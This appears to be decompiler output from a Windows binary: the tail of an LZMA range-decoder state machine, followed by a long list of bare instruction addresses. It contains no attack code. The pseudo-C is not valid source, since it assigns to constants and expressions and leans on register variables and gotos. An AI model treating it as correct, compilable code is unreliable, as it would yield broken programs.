							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                              0x00406bc0
                                                                                              0x00406bc7
                                                                                              0x00406bcd
                                                                                              0x00406bd3
                                                                                              0x00000000
                                                                                              0x00406bd7
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406bec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x00000000
                                                                                              0x00406bf9
                                                                                              0x00406bfd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c06
                                                                                              0x00406c09
                                                                                              0x00406c0c
                                                                                              0x00406c0e
                                                                                              0x00406c10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c16
                                                                                              0x00406c19
                                                                                              0x00406c1b
                                                                                              0x00406c1c
                                                                                              0x00406c1f
                                                                                              0x00406c21
                                                                                              0x00406c22
                                                                                              0x00406c24
                                                                                              0x00406c27
                                                                                              0x00406c2c
                                                                                              0x00406c31
                                                                                              0x00406c3a
                                                                                              0x00406c4d
                                                                                              0x00406c50
                                                                                              0x00406c59
                                                                                              0x00406c5c
                                                                                              0x00406c84
                                                                                              0x00406c84
                                                                                              0x00406c86
                                                                                              0x00406c94
                                                                                              0x00406c94
                                                                                              0x00406c98
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c88
                                                                                              0x00406c8b
                                                                                              0x00406c8b
                                                                                              0x00406c8c
                                                                                              0x00406c8c
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c5e
                                                                                              0x00406c62
                                                                                              0x00406c67
                                                                                              0x00406c67
                                                                                              0x00406c70
                                                                                              0x00406c76
                                                                                              0x00406c78
                                                                                              0x00406c7b
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c9e
                                                                                              0x00406c9e
                                                                                              0x00406ca2
                                                                                              0x0040754e
                                                                                              0x00000000
                                                                                              0x0040754e
                                                                                              0x00406cab
                                                                                              0x00406cbb
                                                                                              0x00406cbe
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc4
                                                                                              0x00406cc4
                                                                                              0x00406cc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406cca
                                                                                              0x00406ccd
                                                                                              0x00406cd0
                                                                                              0x00406cfa
                                                                                              0x00406d00
                                                                                              0x00406d07
                                                                                              0x00000000
                                                                                              0x00406d07
                                                                                              0x00406cd2
                                                                                              0x00406cd6
                                                                                              0x00406cd9
                                                                                              0x00406cde
                                                                                              0x00406cde
                                                                                              0x00406ce9
                                                                                              0x00406cef
                                                                                              0x00406cf1
                                                                                              0x00406cf4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d39
                                                                                              0x00406d3f
                                                                                              0x00406d42
                                                                                              0x00406d4f
                                                                                              0x00406d57
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d0e
                                                                                              0x00406d0e
                                                                                              0x00406d12
                                                                                              0x0040755d
                                                                                              0x00000000
                                                                                              0x0040755d
                                                                                              0x00406d1e
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d2c
                                                                                              0x00406d2f
                                                                                              0x00406d32
                                                                                              0x00406d35
                                                                                              0x00406d37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073d4
                                                                                              0x004073da
                                                                                              0x004073dd
                                                                                              0x004073e0
                                                                                              0x004073fa
                                                                                              0x004073fd
                                                                                              0x00407403
                                                                                              0x0040740e
                                                                                              0x0040740e
                                                                                              0x00407410
                                                                                              0x004073e2
                                                                                              0x004073e2
                                                                                              0x004073f1
                                                                                              0x004073f5
                                                                                              0x004073f5
                                                                                              0x00407413
                                                                                              0x0040741a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040741c
                                                                                              0x0040741c
                                                                                              0x00407420
                                                                                              0x004075cf
                                                                                              0x00000000
                                                                                              0x004075cf
                                                                                              0x0040742c
                                                                                              0x00407433
                                                                                              0x0040743b
                                                                                              0x0040743b
                                                                                              0x0040743b
                                                                                              0x0040743e
                                                                                              0x00407441
                                                                                              0x00407441
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d5f
                                                                                              0x00406d61
                                                                                              0x00406d64
                                                                                              0x00406dd5
                                                                                              0x00406dd8
                                                                                              0x00406ddb
                                                                                              0x00406de2
                                                                                              0x00406dec
                                                                                              0x00000000
                                                                                              0x00406dec
                                                                                              0x00406d66
                                                                                              0x00406d6a
                                                                                              0x00406d6d
                                                                                              0x00406d6f
                                                                                              0x00406d72
                                                                                              0x00406d75
                                                                                              0x00406d77
                                                                                              0x00406d7a
                                                                                              0x00406d7c
                                                                                              0x00406d81
                                                                                              0x00406d84
                                                                                              0x00406d87
                                                                                              0x00406d8b
                                                                                              0x00406d92
                                                                                              0x00406d95
                                                                                              0x00406d9c
                                                                                              0x00406da0
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406dac
                                                                                              0x00406daf
                                                                                              0x00406dcd
                                                                                              0x00406dcf
                                                                                              0x00000000
                                                                                              0x00406dcf
                                                                                              0x00406db1
                                                                                              0x00406db4
                                                                                              0x00406db7
                                                                                              0x00406dba
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbf
                                                                                              0x00406dc2
                                                                                              0x00406dc4
                                                                                              0x00406dc5
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ffe
                                                                                              0x00407002
                                                                                              0x00407020
                                                                                              0x00407023
                                                                                              0x0040702a
                                                                                              0x0040702d
                                                                                              0x00407030
                                                                                              0x00407033
                                                                                              0x00407036
                                                                                              0x00407039
                                                                                              0x0040703b
                                                                                              0x00407042
                                                                                              0x00407043
                                                                                              0x00407045
                                                                                              0x00407048
                                                                                              0x0040704b
                                                                                              0x0040704e
                                                                                              0x0040704e
                                                                                              0x00407053
                                                                                              0x00000000
                                                                                              0x00407053
                                                                                              0x00407004
                                                                                              0x00407007
                                                                                              0x0040700a
                                                                                              0x00407014
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407068
                                                                                              0x0040706c
                                                                                              0x0040708f
                                                                                              0x00407092
                                                                                              0x00407095
                                                                                              0x0040709f
                                                                                              0x0040706e
                                                                                              0x0040706e
                                                                                              0x00407071
                                                                                              0x00407074
                                                                                              0x00407077
                                                                                              0x00407084
                                                                                              0x00407087
                                                                                              0x00407087
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070ab
                                                                                              0x004070af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070b5
                                                                                              0x004070b9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070bf
                                                                                              0x004070c1
                                                                                              0x004070c5
                                                                                              0x004070c5
                                                                                              0x004070c8
                                                                                              0x004070cc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040711c
                                                                                              0x00407120
                                                                                              0x00407127
                                                                                              0x0040712a
                                                                                              0x0040712d
                                                                                              0x00407137
                                                                                              0x00000000
                                                                                              0x00407137
                                                                                              0x00407122
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407143
                                                                                              0x00407147
                                                                                              0x0040714e
                                                                                              0x00407151
                                                                                              0x00407154
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407157
                                                                                              0x0040715a
                                                                                              0x0040715d
                                                                                              0x0040715d
                                                                                              0x00407160
                                                                                              0x00407163
                                                                                              0x00407166
                                                                                              0x00407166
                                                                                              0x00407169
                                                                                              0x00407170
                                                                                              0x00407175
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407203
                                                                                              0x00407203
                                                                                              0x00407207
                                                                                              0x004075a5
                                                                                              0x00000000
                                                                                              0x004075a5
                                                                                              0x0040720d
                                                                                              0x00407210
                                                                                              0x00407213
                                                                                              0x00407217
                                                                                              0x0040721a
                                                                                              0x00407220
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407225
                                                                                              0x00407228
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406df8
                                                                                              0x00406df8
                                                                                              0x00406dfc
                                                                                              0x00407569
                                                                                              0x00000000
                                                                                              0x00407569
                                                                                              0x00406e02
                                                                                              0x00406e05
                                                                                              0x00406e08
                                                                                              0x00406e0c
                                                                                              0x00406e0f
                                                                                              0x00406e15
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e1a
                                                                                              0x00406e1d
                                                                                              0x00406e1d
                                                                                              0x00406e20
                                                                                              0x00406e23
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e29
                                                                                              0x00406e2f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e35
                                                                                              0x00406e35
                                                                                              0x00406e39
                                                                                              0x00406e3c
                                                                                              0x00406e3f
                                                                                              0x00406e42
                                                                                              0x00406e45
                                                                                              0x00406e46
                                                                                              0x00406e49
                                                                                              0x00406e4b
                                                                                              0x00406e51
                                                                                              0x00406e54
                                                                                              0x00406e57
                                                                                              0x00406e5a
                                                                                              0x00406e5d
                                                                                              0x00406e60
                                                                                              0x00406e63
                                                                                              0x00406e7f
                                                                                              0x00406e82
                                                                                              0x00406e85
                                                                                              0x00406e88
                                                                                              0x00406e8f
                                                                                              0x00406e93
                                                                                              0x00406e95
                                                                                              0x00406e99
                                                                                              0x00406e65
                                                                                              0x00406e65
                                                                                              0x00406e69
                                                                                              0x00406e71
                                                                                              0x00406e76
                                                                                              0x00406e78
                                                                                              0x00406e7a
                                                                                              0x00406e7a
                                                                                              0x00406e9c
                                                                                              0x00406ea3
                                                                                              0x00406ea6
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eb1
                                                                                              0x00406eb1
                                                                                              0x00406eb5
                                                                                              0x00407575
                                                                                              0x00000000
                                                                                              0x00407575
                                                                                              0x00406ebb
                                                                                              0x00406ebe
                                                                                              0x00406ec1
                                                                                              0x00406ec5
                                                                                              0x00406ec8
                                                                                              0x00406ece
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed3
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406edc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ede
                                                                                              0x00406ee1
                                                                                              0x00406ee4
                                                                                              0x00406ee7
                                                                                              0x00406eea
                                                                                              0x00406eed
                                                                                              0x00406ef0
                                                                                              0x00406ef3
                                                                                              0x00406ef6
                                                                                              0x00406ef9
                                                                                              0x00406efc
                                                                                              0x00406f14
                                                                                              0x00406f17
                                                                                              0x00406f1a
                                                                                              0x00406f1d
                                                                                              0x00406f1d
                                                                                              0x00406f20
                                                                                              0x00406f24
                                                                                              0x00406f26
                                                                                              0x00406efe
                                                                                              0x00406efe
                                                                                              0x00406f06
                                                                                              0x00406f0b
                                                                                              0x00406f0d
                                                                                              0x00406f0f
                                                                                              0x00406f0f
                                                                                              0x00406f29
                                                                                              0x00406f30
                                                                                              0x00406f33
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00406f33
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f75
                                                                                              0x00406f75
                                                                                              0x00406f79
                                                                                              0x00407581
                                                                                              0x00000000
                                                                                              0x00407581
                                                                                              0x00406f7f
                                                                                              0x00406f82
                                                                                              0x00406f85
                                                                                              0x00406f89
                                                                                              0x00406f8c
                                                                                              0x00406f92
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f97
                                                                                              0x00406f9a
                                                                                              0x00406f9a
                                                                                              0x00406fa0
                                                                                              0x00406f3e
                                                                                              0x00406f3e
                                                                                              0x00406f41
                                                                                              0x00000000
                                                                                              0x00406f41
                                                                                              0x00406fa2
                                                                                              0x00406fa2
                                                                                              0x00406fa5
                                                                                              0x00406fa8
                                                                                              0x00406fab
                                                                                              0x00406fae
                                                                                              0x00406fb1
                                                                                              0x00406fb4
                                                                                              0x00406fb7
                                                                                              0x00406fba
                                                                                              0x00406fbd
                                                                                              0x00406fc0
                                                                                              0x00406fd8
                                                                                              0x00406fdb
                                                                                              0x00406fde
                                                                                              0x00406fe1
                                                                                              0x00406fe1
                                                                                              0x00406fe4
                                                                                              0x00406fe8
                                                                                              0x00406fea
                                                                                              0x00406fc2
                                                                                              0x00406fc2
                                                                                              0x00406fca
                                                                                              0x00406fcf
                                                                                              0x00406fd1
                                                                                              0x00406fd3
                                                                                              0x00406fd3
                                                                                              0x00406fed
                                                                                              0x00406ff4
                                                                                              0x00406ff7
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00407286
                                                                                              0x00407286
                                                                                              0x0040728a
                                                                                              0x004075b1
                                                                                              0x00000000
                                                                                              0x004075b1
                                                                                              0x00407290
                                                                                              0x00407293
                                                                                              0x00407296
                                                                                              0x0040729a
                                                                                              0x0040729d
                                                                                              0x004072a3
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407056
                                                                                              0x00407056
                                                                                              0x00407059
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407395
                                                                                              0x00407399
                                                                                              0x004073bb
                                                                                              0x004073be
                                                                                              0x004073c8
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x0040739b
                                                                                              0x0040739e
                                                                                              0x004073a2
                                                                                              0x004073a5
                                                                                              0x004073a5
                                                                                              0x004073a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00407489
                                                                                              0x00407489
                                                                                              0x00000000
                                                                                              0x00407489
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717f
